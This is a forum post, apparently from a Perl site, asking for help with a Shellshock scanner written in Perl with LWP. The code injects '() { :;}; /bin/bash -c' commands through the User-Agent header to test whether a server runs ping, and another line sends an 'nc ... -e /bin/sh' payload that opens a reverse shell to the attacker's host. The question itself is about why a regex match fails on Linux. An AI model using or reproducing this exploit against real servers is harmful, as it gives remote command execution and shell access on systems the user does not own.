$ua = new LWP::UserAgent; $ua->agent("$Inject; nc $bip $bport -e /bin/sh'"); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content;
I found that code which works fine on windows and the problem is on Unix it doesn't follow the =~ thingy Ok here:
sub PingInject{ $url = "$target"; $ua = new LWP::UserAgent; $ua->agent("() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"); $ua->timeout(15); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content; if($body =~ /--- 8.8.8.8 ping statistics ---/){ print "[+] Shellshock Ping Injection was injected successfully! (Vul +nerable!) \n"; $injectionFound = "yes"; $InjectPoint = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"; $Inject = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8"; InjCorrect(); } else { print "[-] Shellshock Ping Injection was not injected successfully! +(Not Vulnerable!) \n"; } }
At the part where it says "=~ /--- 8.8.8.8 ping statistics ---/" on windows it does follow that statement but not on linux it just says the else statement... So any ideas on how to fix that?
In reply to Re^2: Raw HTTP Request / Response
by Ghosty
in thread Raw HTTP Request / Response
by Ghosty
| For: | Use: | ||
| & | & | ||
| < | < | ||
| > | > | ||
| [ | [ | ||
| ] | ] |